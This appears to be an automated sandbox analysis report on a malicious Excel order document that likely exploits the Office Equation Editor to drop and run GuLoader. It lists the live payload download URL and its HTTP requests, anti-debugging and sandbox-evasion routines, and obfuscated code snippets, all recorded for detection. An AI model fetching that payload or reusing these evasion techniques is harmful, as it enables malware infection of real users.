Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405002 push eax; iretd	6_2_00405004
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040201C push eax; ret	6_2_0040201D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403A30 push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404ADA push eax; iretd	6_2_00404ADC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405A85 push ebx; iretd	6_2_00405A86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004044A2 push ebx; iretd	6_2_004044A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401CAA pushad ; ret	6_2_00401CB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404536 push FFFFFFD1h; ret	6_2_00404538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401FC6 pushad ; retf	6_2_00401FC7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404DDE push eax; retf	6_2_00404DE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004039EA push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004023FD push es; ret	6_2_004023FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D8C push edx; retf	6_2_00402D8D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040219D push ebx; iretd	6_2_004021AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A406 push esp; ret	6_2_0235A407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A402 push esp; ret	6_2_0235A403
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A40A push esp; ret	6_2_0235A40B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F6 push esp; ret	6_2_0235A3F7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F2 push esp; ret	6_2_0235A3F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FE push esp; ret	6_2_0235A3FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FA push esp; ret	6_2_0235A3FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EE push esp; ret	6_2_0235A3EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EA push esp; ret	6_2_0235A3EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3C8 push esp; ret	6_2_0235A3E7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA40A push esp; ret	9_2_001BA40B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA402 push esp; ret	9_2_001BA403
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA406 push esp; ret	9_2_001BA407
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8E4C push eax; ret	9_2_001B8E4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CE7 pushad ; iretd	9_2_001B4CE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9A push edx; ret	9_2_001B8FA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA3FA push esp; ret	9_2_001BA3FB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 000000000040B9F2 second address: 000000000040B9F2 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, 000000A5h 0x00000008 xor eax, edx 0x0000000a pand xmm2, xmm7 0x0000000e jmp 00007FF93438F201h 0x00000010 cmp ch, 0000003Bh 0x00000013 dec edi 0x00000014 cmp dx, 00E4h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FF93438F126h 0x00000022 cmp di, 008Dh 0x00000027 mov ebx, 4E8EE3D3h 0x0000002c cmp bl, FFFFFFE1h 0x0000002f sub ebx, E7F2E312h 0x00000035 cmp ah, 00000049h 0x00000038 fabs 0x0000003a jmp 00007FF93438F200h 0x0000003c xor ebx, 8F76F07Eh 0x00000042 cmp edx, 4Fh 0x00000045 add ebx, 16550F41h 0x0000004b cmp si, 00E6h 0x00000050 cmp eax, 10h 0x00000053 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904

Thread sleep time: -300000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9 mov eax, dword ptr fs:[00000030h]	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83 mov eax, dword ptr fs:[00000030h]	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36 mov eax, dword ptr fs:[00000030h]	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B mov eax, dword ptr fs:[00000030h]	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235577C mov eax, dword ptr fs:[00000030h]	6_2_0235577C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357759 mov eax, dword ptr fs:[00000030h]	6_2_02357759
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357DA9 mov eax, dword ptr fs:[00000030h]	6_2_02357DA9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32 mov eax, dword ptr fs:[00000030h]	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7759 mov eax, dword ptr fs:[00000030h]	9_2_001B7759
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B577C mov eax, dword ptr fs:[00000030h]	9_2_001B577C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA9 mov eax, dword ptr fs:[00000030h]	9_2_001B7DA9

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_023567FF LdrInitializeThunk,

6_2_023567FF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.85.181	unknown	United States		36352	AS-COLOCROSSINGUS	true
151.101.65.195	ggle.io	United States		54113	FASTLYUS	false

Contacted Domains

Name	IP	Active
ggle.io	151.101.65.195	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.85.181/msn/vbc.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ggle.io/4GZv	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}

Multi AV Scanner detection for submitted file

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%			Perma Link
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Antivirus detection for URL or domain

Source: http://23.95.85.181/msn/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.95.85.181/msn/vbc.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 51%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: ggle.io

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downloa

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195
Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 91D8F771.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ggle.io

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040135C	6_2_0040135C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023506C1	6_2_023506C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599A3	6_2_023599A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A38	6_2_02359A38
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352615	6_2_02352615
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352009	6_2_02352009
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235027E	6_2_0235027E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235607E	6_2_0235607E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235747B	6_2_0235747B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354268	6_2_02354268
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235286A	6_2_0235286A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351046	6_2_02351046
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357C4D	6_2_02357C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358CB4	6_2_02358CB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352ABC	6_2_02352ABC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532AD	6_2_023532AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A9F	6_2_02359A9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351482	6_2_02351482
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023582E1	6_2_023582E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023512DC	6_2_023512DC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532C0	6_2_023532C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023504CB	6_2_023504CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023558CA	6_2_023558CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359127	6_2_02359127
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351328	6_2_02351328
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235312B	6_2_0235312B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235331E	6_2_0235331E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354106	6_2_02354106
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352D00	6_2_02352D00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350F0A	6_2_02350F0A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353172	6_2_02353172
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357978	6_2_02357978
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353B67	6_2_02353B67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350D57	6_2_02350D57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023511B6	6_2_023511B6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355FB1	6_2_02355FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351FBE	6_2_02351FBE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352FAC	6_2_02352FAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352B94	6_2_02352B94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B86	6_2_02358B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359B86	6_2_02359B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599E0	6_2_023599E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023583E3	6_2_023583E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023507ED	6_2_023507ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023591EF	6_2_023591EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358DEA	6_2_02358DEA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A	9_2_001B5B9A
